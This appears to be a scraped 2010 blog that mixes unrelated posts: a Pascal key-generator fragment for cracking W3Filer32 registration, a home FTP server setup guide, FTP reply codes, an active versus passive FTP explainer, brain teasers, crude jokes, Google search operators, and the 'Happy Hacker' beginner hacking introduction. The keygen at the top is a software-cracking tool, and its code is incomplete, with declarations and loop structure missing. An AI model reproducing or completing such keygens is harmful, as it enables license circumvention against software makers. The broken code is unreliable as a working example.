                  ------------------- Cut here ---------------------------------------------
                  Program W3FilerKeygen;
                  Writeln(' W3Filer32 V1.1.3 Keymaker');
                  writeln('Cracked by ^pain^ ''97 / Rebels!');
                  Write('Your Name:'); { Read the name }
                  Write('Serial Number:');
                  readln(SerialNum); {Yes, we need the serial number for the calculation!}
                  For I:=1 to length(Name) do
                  If Name[I]<>' ' then begin
                  eb:=ord(Name[I]) shl 3; {EB = Name[I] Shl 03h}
                  Ed:=ord(Name[I]); {ED = Name[I]}
                  ed:=ed*(x); {ED=ED*Offset}
                  eb:=eb+ed; {Add ED to EB}
                  Key:=Key+EB; {Add EB to KEY}
                  Key:=Key+(SerialNum shr 3); { Add SerialNum shr 03h to Key}
                  { From here, this is just HEX2STRING --> I`m quite sure it's
                  Self explaintory, else - go and learn number bases again! ;-)}
                  digit:=Key mod 16;
                  key:=key div 16;
                  If digit<10 then KeyHex:=Chr(Digit+ord('0'))+KeyHex;
                  If digit>10 then KeyHex:=Chr(Digit-10+ord('a'))+KeyHex;
                  until key=0;
                  writeln('Your Key:',KeyHex);
                  writeln(' Enjoy!');

                  Wednesday, July 21, 2010

                  all about ftp

                  Setting Up A Ftp:

                  Well, since many of us have always wondered this, here it is. Long and drawn out. Also, before attempting this, realize one thing; You will have to give up your time, effort, bandwidth, and security to have a quality ftp server.
                  That being said, here it goes. First of all, find out if your IP (Internet Protocol) is static (not changing) or dynamic (changes everytime you log on). To do this, first consider the fact if you have a dial up modem. If you do, chances are about 999 999 out of 1 000 000 that your IP is dynamic. To make it static, just go to a place like h*tp://www.myftp.org/ to register for a static ip address.

                  You'll then need to get your IP. This can be done by doing this:
                  Going to Start -> Run -> winipcfg or www.ask.com and asking 'What is my IP?'

                  After doing so, you'll need to download an FTP server client. Personally, I'd recommend G6 FTP Server, Serv-U FTPor Bullitproof v2.15 all three of which are extremely reliable, and the norm of the ftp world.
                  You can download them on this site: h*tp://www.liaokai.com/softw_en/d_index.htm

                  First, you'll have to set up your ftp. For this guide, I will use step-by-step instructions for G6. First, you'll have to go into 'Setup -> General'. From here, type in your port # (default is 21). I recommend something unique, or something a bit larger (ex: 3069). If you want to, check the number of max users (this sets the amount of simultaneous maximum users on your server at once performing actions - The more on at once, the slower the connection and vice versa).

                  The below options are then chooseable:
                  -Launch with windows
                  -Activate FTP Server on Start-up
                  -Put into tray on startup
                  -Allow multiple instances
                  -Show "Loading..." status at startup
                  -Scan drive(s) at startup
                  -Confirm exit

                  You can do what you want with these, as they are pretty self explanatory. The scan drive feature is nice, as is the 2nd and the last option. From here, click the 'options' text on the left column.

                  To protect your server, you should check 'login check' and 'password check', 'Show relative path (a must!)', and any other options you feel you'll need. After doing so, click the 'advanced' text in the left column. You should then leave the buffer size on the default (unless of course you know what you're doing ), and then allow the type of ftp you want.

                  Uploading and downloading is usually good, but it's up to you if you want to allow uploads and/or downloads. For the server priority, that will determine how much conventional memory will be used and how much 'effort' will go into making your server run smoothly.

                  Anti-hammering is also good, as it prevents people from slowing down your speed. From here, click 'Log Options' from the left column. If you would like to see and record every single command and clutter up your screen, leave the defaults.

                  But, if you would like to see what is going on with the lowest possible space taken, click 'Screen' in the top column. You should then check off 'Log successful logins', and all of the options in the client directry, except 'Log directory changes'. After doing so, click 'Ok' in the bottom left corner.

                  You will then have to go into 'Setup -> User Accounts' (or ctrl & u). From here, you should click on the right most column, and right click. Choose 'Add', and choose the username(s) you would like people to have access to.

                  After giving a name (ex: themoonlanding), you will have to give them a set password in the bottom column (ex: wasfaked). For the 'Home IP' directory, (if you registered with a static server, check 'All IP Homes'. If your IP is static by default, choose your IP from the list. You will then have to right click in the very center column, and choose 'Add'.

                  From here, you will have to set the directory you want the people to have access to. After choosing the directory, I suggest you choose the options 'Read', 'List', and 'Subdirs', unless of course you know what you're doing . After doing so, make an 'upload' folder in the directory, and choose to 'add' this folder seperately to the center column. Choose 'write', 'append', 'make', 'list', and 'subdirs'. This will allow them to upload only to specific folders (your upload folder).

                  Now click on 'Miscellaneous' from the left column. Choose 'enable account', your time-out (how long it takes for people to remain idle before you automatically kick them off), the maximum number of users for this name, the maximum number of connections allowed simultaneously for one ip address, show relative path (a must!), and any other things at the bottom you'd like to have. Now click 'Ok'.

                  From this main menu, click the little boxing glove icon in the top corner, and right click and unchoose the hit-o-meter for both uploads and downloads (with this you can monitor IP activity). Now click the lightning bolt, and your server is now up and running.

                  Post your ftp info, like this:

         (or something else, such as: 'f*p://example.getmyip.com')

                  User: *** (The username of the client)

                  Pass: *** (The password)

                  Port: *** (The port number you chose)

                  So make a FTP and join the FTP section

                  Listing The Contents Of A Ftp:

                  Listing the content of a FTP is very simple.
                  You will need FTP Content Maker, which can be downloaded from here:

                  1. Put in the IP of the server. Do not put "ftp://" or a "/" because it will not work if you do so.
                  2. Put in the port. If the port is the default number, 21, you do not have to enter it.
                  3. Put in the username and password in the appropriate fields. If the login is anonymous, you do not have to enter it.
                  4. If you want to list a specific directory of the FTP, place it in the directory field. Otherwise, do not enter anything in the directory field.
                  5. Click "Take the List!"
                  6. After the list has been taken, click the UBB output tab, and copy and paste to wherever you want it.

                  If FTP Content Maker is not working, it is probably because the server does not utilize Serv-U Software.

                  If you get this error message:
                  StatusCode = 550
                  LastResponse was : 'Unable to open local file test-ftp'
                  Error = 550 (Unable to open local file test-ftp)
                  Error = Unable to open local file test-ftp = 550
                  Close and restart FTP Content Maker, then try again.

                  error messages:

                  110 Restart marker reply. In this case, the text is exact and not left to the particular implementation; it must read: MARK yyyy = mmmm Where yyyy is User-process data stream marker, and mmmm server's equivalent marker (note the spaces between markers and "=").
                  120 Service ready in nnn minutes.
                  125 Data connection already open; transfer starting.
                  150 File status okay; about to open data connection.
                  200 Command okay.
                  202 Command not implemented, superfluous at this site.
                  211 System status, or system help reply.
                  212 Directory status.
                  213 File status.
                  214 Help message. On how to use the server or the meaning of a particular non-standard command. This reply is useful only to the human user.
                  215 NAME system type. Where NAME is an official system name from the list in the Assigned Numbers document.
                  220 Service ready for new user.
                  221 Service closing control connection. Logged out if appropriate.
                  225 Data connection open; no transfer in progress.
                  226 Closing data connection. Requested file action successful (for example, file transfer or file abort).
                  227 Entering Passive Mode (h1,h2,h3,h4,p1,p2).
                  230 User logged in, proceed.
                  250 Requested file action okay, completed.
                  257 "PATHNAME" created.
                  331 User name okay, need password.
                  332 Need account for login.
                  350 Requested file action pending further information.
                  421 Too many users logged to the same account
                  425 Can't open data connection.
                  426 Connection closed; transfer aborted.
                  450 Requested file action not taken. File unavailable (e.g., file busy).
                  451 Requested action aborted: local error in processing.
                  452 Requested action not taken. Insufficient storage space in system.
                  500 Syntax error, command unrecognized. This may include errors such as command line too long.
                  501 Syntax error in parameters or arguments.
                  502 Command not implemented.
                  503 Bad sequence of commands.
                  504 Command not implemented for that parameter.
                  530 Not logged in.
                  532 Need account for storing files.
                  550 Requested action not taken. File unavailable (e.g., file not found, no access).
                  551 Requested action aborted: page type unknown.
                  552 Requested file action aborted. Exceeded storage allocation (for current directory or dataset).
                  553 Requested action not taken. File name not allowed.

                  Active FTP vs. Passive FTP, a Definitive Explanation

                  One of the most commonly seen questions when dealing with firewalls and other Internet connectivity issues is the difference between active and passive FTP and how best to support either or both of them. Hopefully the following text will help to clear up some of the confusion over how to support FTP in a firewalled environment.

                  This may not be the definitive explanation, as the title claims, however, I've heard enough good feedback and seen this document linked in enough places to know that quite a few people have found it to be useful. I am always looking for ways to improve things though, and if you find something that is not quite clear or needs more explanation, please let me know! Recent additions to this document include the examples of both active and passive command line FTP sessions. These session examples should help make things a bit clearer. They also provide a nice picture into what goes on behind the scenes during an FTP session. Now, on to the information...

                  The Basics
                  FTP is a TCP based service exclusively. There is no UDP component to FTP. FTP is an unusual service in that it utilizes two ports, a 'data' port and a 'command' port (also known as the control port). Traditionally these are port 21 for the command port and port 20 for the data port. The confusion begins however, when we find that depending on the mode, the data port is not always on port 20.

                  Active FTP
                  In active mode FTP the client connects from a random unprivileged port (N > 1024) to the FTP server's command port, port 21. Then, the client starts listening to port N+1 and sends the FTP command PORT N+1 to the FTP server. The server will then connect back to the client's specified data port from its local data port, which is port 20.

                  From the server-side firewall's standpoint, to support active mode FTP the following communication channels need to be opened:

                  FTP server's port 21 from anywhere (Client initiates connection)
                  FTP server's port 21 to ports > 1024 (Server responds to client's control port)
                  FTP server's port 20 to ports > 1024 (Server initiates data connection to client's data port)
                  FTP server's port 20 from ports > 1024 (Client sends ACKs to server's data port)

                  In step 1, the client's command port contacts the server's command port and sends the command PORT 1027. The server then sends an ACK back to the client's command port in step 2. In step 3 the server initiates a connection on its local data port to the data port the client specified earlier. Finally, the client sends an ACK back as shown in step 4.

                  The main problem with active mode FTP actually falls on the client side. The FTP client doesn't make the actual connection to the data port of the server--it simply tells the server what port it is listening on and the server connects back to the specified port on the client. From the client side firewall this appears to be an outside system initiating a connection to an internal client--something that is usually blocked.

                  Active FTP Example
                  Below is an actual example of an active FTP session. The only things that have been changed are the server names, IP addresses, and user names. In this example an FTP session is initiated from testbox1.slacksite.com (, a linux box running the standard FTP command line client, to testbox2.slacksite.com (, a linux box running ProFTPd 1.2.2RC2. The debugging (-d) flag is used with the FTP client to show what is going on behind the scenes. Everything in red is the debugging output which shows the actual FTP commands being sent to the server and the responses generated from those commands. Normal server output is shown in black, and user input is in bold.

                  There are a few interesting things to consider about this dialog. Notice that when the PORT command is issued, it specifies a port on the client ( system, rather than the server. We will see the opposite behavior when we use passive FTP. While we are on the subject, a quick note about the format of the PORT command. As you can see in the example below it is formatted as a series of six numbers separated by commas. The first four octets are the IP address while the second two octets comprise the port that will be used for the data connection. To find the actual port multiply the fifth octet by 256 and then add the sixth octet to the total. Thus in the example below the port number is ( (14*256) + 178), or 3762. A quick check with netstat should confirm this information.

                  testbox1: {/home/p-t/slacker/public_html} % ftp -d testbox2
                  Connected to testbox2.slacksite.com.
                  220 testbox2.slacksite.com FTP server ready.
                  Name (testbox2:slacker): slacker
                  ---> USER slacker
                  331 Password required for slacker.
                  Password: TmpPass
                  ---> PASS XXXX
                  230 User slacker logged in.
                  ---> SYST
                  215 UNIX Type: L8
                  Remote system type is UNIX.
                  Using binary mode to transfer files.
                  ftp> ls
                  ftp: setsockopt (ignored): Permission denied
                  ---> PORT 192,168,150,80,14,178
                  200 PORT command successful.
                  ---> LIST
                  150 Opening ASCII mode data connection for file list.
                  drwx------ 3 slacker users 104 Jul 27 01:45 public_html
                  226 Transfer complete.
                  ftp> quit
                  ---> QUIT
                  221 Goodbye.

                  Passive FTP
                  In order to resolve the issue of the server initiating the connection to the client a different method for FTP connections was developed. This was known as passive mode, or PASV, after the command used by the client to tell the server it is in passive mode.

                  In passive mode FTP the client initiates both connections to the server, solving the problem of firewalls filtering the incoming data port connection to the client from the server. When opening an FTP connection, the client opens two random unprivileged ports locally (N > 1024 and N+1). The first port contacts the server on port 21, but instead of then issuing a PORT command and allowing the server to connect back to its data port, the client will issue the PASV command. The result of this is that the server then opens a random unprivileged port (P > 1024) and sends the PORT P command back to the client. The client then initiates the connection from port N+1 to port P on the server to transfer data.

                  From the server-side firewall's standpoint, to support passive mode FTP the following communication channels need to be opened:

                  FTP server's port 21 from anywhere (Client initiates connection)
                  FTP server's port 21 to ports > 1024 (Server responds to client's control port)
                  FTP server's ports > 1024 from anywhere (Client initiates data connection to random port specified by server)
                  FTP server's ports > 1024 to remote ports > 1024 (Server sends ACKs (and data) to client's data port)

                  In step 1, the client contacts the server on the command port and issues the PASV command. The server then replies in step 2 with PORT 2024, telling the client which port it is listening to for the data connection. In step 3 the client then initiates the data connection from its data port to the specified server data port. Finally, the server sends back an ACK in step 4 to the client's data port.

                  While passive mode FTP solves many of the problems from the client side, it opens up a whole range of problems on the server side. The biggest issue is the need to allow any remote connection to high numbered ports on the server. Fortunately, many FTP daemons, including the popular WU-FTPD allow the administrator to specify a range of ports which the FTP server will use. See Appendix 1 for more information.

                  The second issue involves supporting and troubleshooting clients which do (or do not) support passive mode. As an example, the command line FTP utility provided with Solaris does not support passive mode, necessitating a third-party FTP client, such as ncftp.

                  With the massive popularity of the World Wide Web, many people prefer to use their web browser as an FTP client. Most browsers only support passive mode when accessing ftp:// URLs. This can either be good or bad depending on what the servers and firewalls are configured to support.

                  Passive FTP Example
                  Below is an actual example of a passive FTP session. The only things that have been changed are the server names, IP addresses, and user names. In this example an FTP session is initiated from testbox1.slacksite.com (, a linux box running the standard FTP command line client, to testbox2.slacksite.com (, a linux box running ProFTPd 1.2.2RC2. The debugging (-d) flag is used with the FTP client to show what is going on behind the scenes. Everything in red is the debugging output which shows the actual FTP commands being sent to the server and the responses generated from those commands. Normal server output is shown in black, and user input is in bold.

                  Notice the difference in the PORT command in this example as opposed to the active FTP example. Here, we see a port being opened on the server ( system, rather than the client. See the discussion about the format of the PORT command above, in the Active FTP Example section.

                  testbox1: {/home/p-t/slacker/public_html} % ftp -d testbox2
                  Connected to testbox2.slacksite.com.
                  220 testbox2.slacksite.com FTP server ready.
                  Name (testbox2:slacker): slacker
                  ---> USER slacker
                  331 Password required for slacker.
                  Password: TmpPass
                  ---> PASS XXXX
                  230 User slacker logged in.
                  ---> SYST
                  215 UNIX Type: L8
                  Remote system type is UNIX.
                  Using binary mode to transfer files.
                  ftp> passive
                  Passive mode on.
                  ftp> ls
                  ftp: setsockopt (ignored): Permission denied
                  ---> PASV
                  227 Entering Passive Mode (192,168,150,90,195,149).
                  ---> LIST
                  150 Opening ASCII mode data connection for file list
                  drwx------ 3 slacker users 104 Jul 27 01:45 public_html
                  226 Transfer complete.
                  ftp> quit
                  ---> QUIT
                  221 Goodbye.

                  The following chart should help admins remember how each FTP mode works:

                  Active FTP :
                  command : client >1024 -> server 21
                  data : client >1024 <- server 20

                  Passive FTP :
                  command : client >1024 -> server 21
                  data : client >1024 -> server >1024

                  A quick summary of the pros and cons of active vs. passive FTP is also in order:

                  Active FTP is beneficial to the FTP server admin, but detrimental to the client side admin. The FTP server attempts to make connections to random high ports on the client, which would almost certainly be blocked by a firewall on the client side. Passive FTP is beneficial to the client, but detrimental to the FTP server admin. The client will make both connections to the server, but one of them will be to a random high port, which would almost certainly be blocked by a firewall on the server side.

                  Luckily, there is somewhat of a compromise. Since admins running FTP servers will need to make their servers accessible to the greatest number of clients, they will almost certainly need to support passive FTP. The exposure of high level ports on the server can be minimized by specifying a limited port range for the FTP server to use. Thus, everything except for this range of ports can be firewalled on the server side. While this doesn't eliminate all risk to the server, it decreases it tremendously.

                  Friday, July 16, 2010

                  Brain Teasers

                  1. There is one word in the English language that is always
                  pronounced incorrectly. What is it?

                  2. A man gave one son 10 cents and another son was given
                  15 cents. What time is it?

                  3. A boat has a ladder that has six rungs, each rung is one
                  foot apart. The bottom rung is one foot from the water.
                  The tide rises at 12 inches every 15 minutes. High tide
                  peaks in one hour. When the tide is at it's highest, how
                  many rungs are under water?

                  4. There is a house with four walls. Each wall faces south.
                  There is a window in each wall. A bear walks by one of
                  the windows. What color is the bear?

                  5. There is a room. The shutters are blowing in. There is
                  broken glass on the floor. There is water on the floor.
                  You find Sloppy dead on the floor. Who is Sloppy? How
                  did Sloppy die?

                  6. If I were in Hawaii and dropped a bowling ball in a bucket
                  of water which is 45 degrees F, and dropped another ball
                  of the same weight, mass, and size in a bucket at
                  30 degrees F, both of them at the same time, which ball
                  would hit the bottom of the bucket first? Same question,
                  but the location is in Canada?

                  7. What is the significance of the following: The year is 1978,
                  thirty-four minutes past noon on May 6th.

                  8. If a farmer has 5 haystacks in one field and 4 haystacks
                  in the other field, how many haystacks would he have if he
                  combined them all in the center field?

                  9. What is it that goes up and goes down but does not move?

                   ............ Answers To Brain Teasers ............

                  1. The word "incorrectly." {Almost cracked your brain, didn't

                  2. 1:45. The man gave away a total of 25 cents. He divided it
                  between two people. Therefore, he gave a quarter to two.

                  3. None, the boat rises with the tide. Duh.

                  4. White. If all the walls face south, the house is at the North
                  pole, and the bear, therefore, is a polar bear.

                  5. Sloppy is a (gold)fish. The wind blew the shutters in,
                  which knocked his goldfish-bowl off the table, and it broke,
                  killing him. {Poor Sloppy.}

                  6. Both questions, same answer: the ball in the bucket of
                  45 degree F water hits the bottom of the bucket last.
                  Did you think that the water in the 30 degree F bucket
                  is frozen? Think again. The question said nothing about
                  that bucket having anything in it. Therefore, there is no
                  water (or ice) to slow the ball down...

                  7. The time and month/date/year American style calendar
                  are 12:34, 5/6/78.

                  8. One. If he combines all of his haystacks, they all become
                  one big stack.

                  9. The temperature.

                  Management Lessons ---------------------------

                  Management Lessons

                  Lesson Number One
                  A crow was sitting on a tree, doing nothing all day. A
                  small rabbit saw the crow, and asked him, "Can I also
                  sit like you and do nothing all day long?"
                  The crow answered: "Sure, why not." So, the rabbit sat
                  on the ground below the crow, and rested.
                  All of a sudden, a fox appeared, jumped on the rabbit
                  and ate it.

                  !!! To be sitting and doing nothing, you must be sitting very, very high up. !!!

                  Lesson Number Two
                  A little bird was flying south for the winter. It was
                  so cold, the bird froze and fell to the ground in a
                  large field. While it was lying there, a
                  cow came by and dropped some dung on it. As the frozen
                  bird lay ! ! there in the pile of cow dung, it began to
                  realize how warm it was. The dung was actually thawing
                  him out! He lay there all warm and happy, and soon
                  began to sing for joy. A passing cat heard the bird
                  singing and came to investigate. Following the sound,
                  the cat discovered the bird under the pile of cow
                  dung, and promptly dug him out and ate him!

                  1) Not everyone who drops shit on you is your enemy.
                  2) Not everyone who gets you out of shit is your friend.
                  3) And when you're in deep shit, keep your mouth shut!

                  Lesson Number Three
                  When the body was first made, all the parts wanted to
                  be Boss. The brain said, "I should be Boss because I
                  control the whole body's responses and functions."
                  The feet said, " We should be Boss as we ca! rr! y the
                  brain about and get him to where he wants to go.
                  The hands said, "We should be the Boss because we do
                  all the work and earn all the money."
                  And so it went on and on with the heart, the lungs and
                  the eyes until finally the asshole spoke up. All the
                  parts laughed at the idea of the asshole being the
                  Boss. So the asshole went on strike, blocked itself up
                  and refused to work. Within a short time the eyes
                  became crossed, the hands clenched, the feet
                  twitched, the heart and lungs began to panic and the
                  brain fevered. Eventually they all decided that the
                  asshole should be the Boss, so the motion was passed.
                  All the other parts did all the work while the Boss
                  just sat and passed out the shit!

                  !!! You don't need brains to be a Boss any asshole will do. !!!

                  Lesson Number Four
                  A turkey was chatting with a bull. "I would love to be
                  able to get to the top of that tree," sighed the
                  turkey, but I haven't got the energy. "Well, why
                  don't you nibble on some of my droppings?" replied the
                  bull. "They're packed with nutrients." The turkey
                  pecked at a lump of dung and found that it actually
                  gave him enough strength to reach the first branch of
                  the tree. The next day, after eating some more dung,he
                  reached the second branch.
                  Finally after a fortnight, there he was proudly
                  perched at the top of the tree. Soon he was promptly
                  spotted by a farmer, who, shot the turkey out of
                  the tree.

                  !!! Bullshit might get you to the top, but it won't keep you there. !!!

                  Monday, June 28, 2010

                  GOOGLE SEARCH MADE EASY ---some google search operators

                  here are some search operators

                  1. site:USAGE site:google.com fox      will find all sites containing the
                    word fox, located within the *.google.com domain,WHAT IT DOES , it restricts results to sites within the specified domain
                  2. intitle : USAGE intitle:fox fire will find all sites with the word fox in the
                    title and fire in the text,What Would Google Do? ,restricts results to documents whose
                    title contains the specified phrase
                  3. allintitle:USAGE  allintitle:fox fire will find all sites with the words fox
                    and fire in the title, so it's equivalent to   intitle:fox intitle:fire ,WHAT IT DOES,restricts results to documents  whose title contains all the specified phrasesGoogle Search & Destroy
                  4. inurl: USAGE inurl:fox fire will find all sites containing the word fire in the text and fox in the URL      WHAT GOOGLE DOES:restricts results to sites whose URL contains the specified phraseGoogle Advertising Tools: Cashing in with AdSense and AdWords 
                  5. allinurl USAGE allinurl:fox fire will find all sites with the words fox
                    and fire in the URL, so it's equivalent to inurl:fox inurl:fire                                                            WHAT IT DOES restricts results to sites whose URL contains all the specified phrases
                  6. filetype, ext USAGE filetype:pdf fire will return PDFs containing the word
                    fire, while filetype:xls fox will return Excel spreadsheets with the word fox                                         WHAT IT DOES restricts results to documents of the specified type
                  7.  numrange USAGE numrange:1-100 fire will return sites containing a number
                    from 1 to 100 and the word fire. The same result can be achieved with 1..100 fire                             What Does It restricts results to documents containing a number from the specified range.
                  8. link USAGE link:www.google.com will return documents containing
                    one or more links to www.google.com                                                                                               What Does It All Mean? restricts results to sites containing links to the specified location                       NOTE:  IT CANNOT BE USED WITH ANY OTHER OPERATOR
                  9. inanchor USAGE inanchor:fire will return documents with links whose description contains the word fire (that's the actual link text, not the URL indicated by the link)      Like What You See? Meet Mini Me! Sex T-shirt       WHAT IT DOES restricts results to sites containing links with the specified phrase in their descriptions
                  10. allintext USAGE allintext:"fire fox" will return documents which contain the phrase fire fox in their text only                                                                                                                                           WHAT IT DOES restricts results to documents containing the specified phrase in the text, but not in the title, link descriptions or URLs
                  11. + USAGE +fire will order results by the number of occurrences of the word fire                             WHAT IT DOES specifies that a phrase should occur frequently in results
                  12. - USAGE -fire will return documents that don't contain the word fire                                                 WHAT HAPPENS specifies that a phrase must not occur in results
                  13. "" USAGE "fire fox" will return documents containing the phrase fire fox                                         WHAT IT DO delimiters for entire search phrases (not single words)
                  14. . USAGE fire.fox will return documents containing the phrases fire fox, fireAfox, fire1fox, fire-fox etc. WHAT DOES IT DO wildcard for a single character
                  15. * USAGE fire * fox will return documents containing the phrases fire the fox, fire in fox, fire or fox etc. WHAT IT DOES wildcard for a single word
                  16. | USAGE "fire fox" | firefox will return documents containing the phrase fire fox or the word firefox WHAT IS IT FOR     logical OR

                  Friday, June 25, 2010

                  HARMLESS HACKING

                  Beginners’ Series #1
                  The Happy Hacker: A Guide to (Mostly) Harmless Computer Hacking

                  “You mean you can hack without breaking the law?"

                  That was the voice of a high school freshman. He had me on the phone because
                  his father had just taken away his computer. His offense? Cracking into my
                  Internet account. The boy had hoped to impress me with  how "kewl" he was.
                  But before I realized he had gotten in, a sysadmin at my ISP had spotted the
                  kid’s harmless explorations and had alerted the parents. Now the boy wanted
                  my help in getting back on line.

                  I told the kid that I sympathized with his father. What if the sysadmin and
                  I had been major grouches? This kid could have wound up in  juvenile
                  detention. Now I don’t agree with putting harmless hackers in  jail, and I
                  would never have testified against him. But that’s what some people do to
                  folks who go snooping in other people’s computer accounts -- even when the
                  culprit does no harm. This boy needs to learn how to keep out of trouble!

                  Hacking is the most exhilarating game on the planet. But it stops being fun
                  when you end up in a cell with a roommate named "Spike." But hacking doesn't
                  have to mean breaking laws. In this book we teach safe hacking so that you
                  don’t have to keep looking back over your shoulders for narcs and cops.

                  What we're talking about is hacking as a healthy recreation, and as a free
                  education that can qualify you to get a high paying job. In fact, many
                  network systems administrators, computer scientists and computer security
                  experts first learned their professions, not in some college program, but
                  from the hacker culture. And you may be surprised to discover that
                  ultimately the Internet is safeguarded not by law enforcement agencies, not
                  by giant corporations, but by a worldwide network of, yes, hackers.

                  You, too, can become one of us.

                  And -- hacking can be surprisingly easy. Heck, if I can do it, anyone can!

                  Regardless of why you want to be a hacker, it is definitely a way to have
                  fun, impress your friends, and get dates. If you are a female hacker you
                  become totally irresistible to men. Take my word for it!;^D

                  These Guides to (mostly) Harmless Hacking can be your gateway into this
                  world. After reading just a few of these Guides you will be able to pull off
                  stunts that will be legal, phun, and will impress the heck out of your friends.

                  These Guides can equip you to become one of the vigilantes that keeps the
                  Internet from being destroyed by bad guys. Especially spammers. Heh, heh,
                  heh. You can also learn how to keep the bad guys from messing with your
                  Internet account, email, and personal computer. You’ll learn not to be
                  frightened by silly hoaxes that pranksters use to keep the average Internet
                  user in a tizzy.

                  If you hang in with us through a year or so, you can learn enough and meet
                  the people on our email list and IRC channel who can help you to become
                  truly elite.

                  However, before you plunge into the hacker subculture, be prepared for that
                  hacker attitude. You have been warned.

                  So...welcome to the adventure of hacking!

                  WHAT DO I NEED IN ORDER TO HACK?
                  Hacking Exposed: Network Security Secrets and Solutions, Sixth Edition
                  You may wonder whether hackers need expensive computer equipment and a shelf
                  full of technical manuals. The answer is NO! Hacking can be surprisingly
                  easy! Better yet, if you know how to search the Web, you can find almost any
                  computer information you need for free.

                  In fact, hacking is so easy that if you have an on-line service and know how
                  to send and read email, you can start hacking immediately. The GTMHH
                  Beginners’ Series #2 will show you where you can download special
                  hacker-friendly programs for Windows that are absolutely free. And we’ll
                  show you some easy hacker tricks you can use them for.

                  Now suppose you want to become an elite hacker? All you will really need is
                  an inexpensive "shell account" with an Internet Service Provider. In the
                  GTMHH  Beginners’ Series #3 we will tell you how to get a shell account, log
                  on, and start playing the greatest game on Earth: Unix hacking! Then in
                  Vol.s I, II, and III of the GTMHH you can get into Unix hacking seriously.

                  You can even make it into the ranks of the Uberhackers without loading up on
                  expensive computer equipment. In Vol. II we introduce Linux, the free
                  hacker-friendly operating system. It will even run on a 386 PC with just 2
                  Mb RAM!  Linux is so good that many Internet Service Providers use it to run
                  their systems.

                  In Vol. III we will also introduce Perl, the shell programming language
                  beloved of Uberhackers. We will even teach some seriously deadly hacker
                  "exploits" that run on Perl using Linux. OK, you could use most of these
                  exploits to do illegal things. But they are only illegal if you run them
                  against someone else’s computer without their permission. You can run any
                  program in this book on your own computer, or your (consenting) friend’s
                  computer -- if you dare! Hey, seriously, nothing in this book will actually
                  hurt your computer, unless you decide to trash it on purpose.

                  We will also open the gateway to an amazing underground where you can stay
                  on top of almost every discovery of computer security flaws. You can learn
                  how to either exploit them -- or defend your computer against them!

                  About the Guides to (mostly) Harmless Hacking

                  We have noticed that there are lots of books that glamorize hackers. To read
                  these books you would think that it takes many years of brilliant work to
                  become one. Of course we hackers love to perpetuate this myth because it
                  makes us look so incredibly kewl.

                  But how many books are out there that tell the beginner step by step how to
                  actually do this hacking stuph? None! Seriously, have you ever read _Secrets
                  of a Superhacker_ by The Knightmare (Loomponics, 1994) or _Forbidden Secrets
                  of the Legion of Doom Hackers_ by Salacious Crumb (St. Mahoun Books, 1994)?
                  They are full of vague and out of date stuph. Give me a break.

                  And if you get on one of the hacker news groups on the Internet and ask
                  people how to do stuph, some of them insult and make fun of you.  OK, they
                  all make fun of you.

                  We see many hackers making a big deal of themselves and being mysterious and
                  refusing to help others learn how to hack. Why? Because they don't want you
                  to know the truth, which is that most of what they are doing is really very

                  Well, we thought about this. We, too, could enjoy the pleasure of insulting
                  people who ask us how to hack. Or we could get big egos by actually teaching
                  thousands of people how to hack. Muhahaha.

                  How to Use the Guides to (mostly) Harmless Hacking

                  If you know how to use a personal computer and are on the Internet, you
                  already know enough to start learning to be a hacker. You don't even need to
                  read every single Guide to (mostly) Harmless Hacking in order to become a

                  You can count on anything in Volumes I, II and III being so easy that you
                  can jump in about anywhere and just follow instructions.

                  But if your plan is to become "elite," you will do better if you read all
                  the Guides, check out the many Web sites and newsgroups to which we will
                  point you, and find a mentor among the many talented hackers who post to our
                  Hackers forum or chat on our IRC server at http://www.infowar.com, and on
                  the Happy Hacker email list (email hacker@techbroker.com with message

                  If your goal is to become an Uberhacker, the Guides will end up being only
                  the first in a mountain of material that you will need to study. However, we
                  offer a study strategy that can aid you in your quest to reach the pinnacle
                  of hacking.

                  How to Not Get Busted
                  Google Hacking for Penetration Testers
                  One slight problem with hacking is that if you step over the line, you can
                  go to jail. We will do our best to warn you when we describe hacks that
                  could get you into trouble with the law. But we are not attorneys or experts
                  on cyberlaw.  In addition, every state and every country has its own laws.
                  And these laws keep on changing. So you have to use a little sense.

                  However, we have a Guide to (mostly) Harmless Hacking Computer Crime Law
                  Series to help you avoid some pitfalls.

                  But the best protection against getting busted is the Golden Rule. If you
                  are about to do something that you would not like to have done to you,
                  forget it. Do hacks that make the world a better place, or that are at least
                  fun and harmless, and you should be able to keep out of trouble.

                  So if you get an idea from the Guides to (mostly) Harmless Hacking that
                  helps you to do something malicious or destructive, it's your problem if you
                  end up being the next hacker behind bars.  Hey, the law won't care if the
                  guy whose computer you trash was being a d***. It won't care that the giant
                  corporation whose database you filched shafted your best buddy once. They
                  will only care that you broke the law.

                  To some people it may sound like phun to become a national sensation in the
                  latest hysteria over Evil Genius hackers. But after the trial, when some
                  reader of these Guides ends up being the reluctant "girlfriend" of a convict
                  named Spike, how happy will his news clippings make him?

                  Conventions Used in the Guides

                  You've probably already noticed that we spell some words funny, like "kewl"
                  and "phun." These are hacker slang terms. Since we often communicate with
                  each other via email, most of our slang consists of ordinary words with
                  extraordinary spellings. For example, a hacker might spell "elite" as
                  "3l1t3," with 3's substituting for e's and 1's for i's. He or she may even
                  spell "elite" as "31337. The Guides sometimes use these slang spellings to
                  help you learn how to write email like a hacker.

                  Of course, the cute spelling stuph we use will go out of date fast. So we do
                  not guarantee that if you use this slang, people will read your email and
                  think, "Ohhh, you must be an Evil Genius! I'm sooo impressed!" 

                  Take it from us, guys who need to keep on inventing new slang to prove they
                  are "k-rad 3l1t3" are often lusers and lamers. So if you don't want to use
                  any of the hacker slang of this book, that's OK by us. Most Uberhackers
                  don't use slang, either.

                  Who Are You?

                  We've made some assumptions about who you are and why you are reading these

                  · You own a PC or Macintosh personal computer
                  · You are on-line with the Internet
                  · You have a sense of humor and adventure and want to express it by hacking
                  · Or -- you want to impress your friends and pick up chicks (or guys) by
                  making them think you are an Evil Genius

                  So, does this picture fit you? If so, OK, d00dz, start your computers. Are
                  you ready to hack?

                  Want to see back issues of Guide to (mostly) Harmless Hacking? See either
                  http://www.vcalpha.com/silicon/void-f.html or

                  We have a discussion group and archives hosted at

                  Chat with us on the Happy Hacker IRC channel. If your browser can use Java,
                  just direct your browser to www.infowar.com, click on chat, and choose the
                  #hackers channel.

                  Subscribe to our email list by emailing to hacker@techbroker.com with
                  message "subscribe"

                  Want to share some kewl stuph with the Happy Hacker list? Correct mistakes?
                  Send your messages to hacker@techbroker.com.  To send me confidential email
                  (please, no discussions of illegal activities) use carolyn@techbroker.com
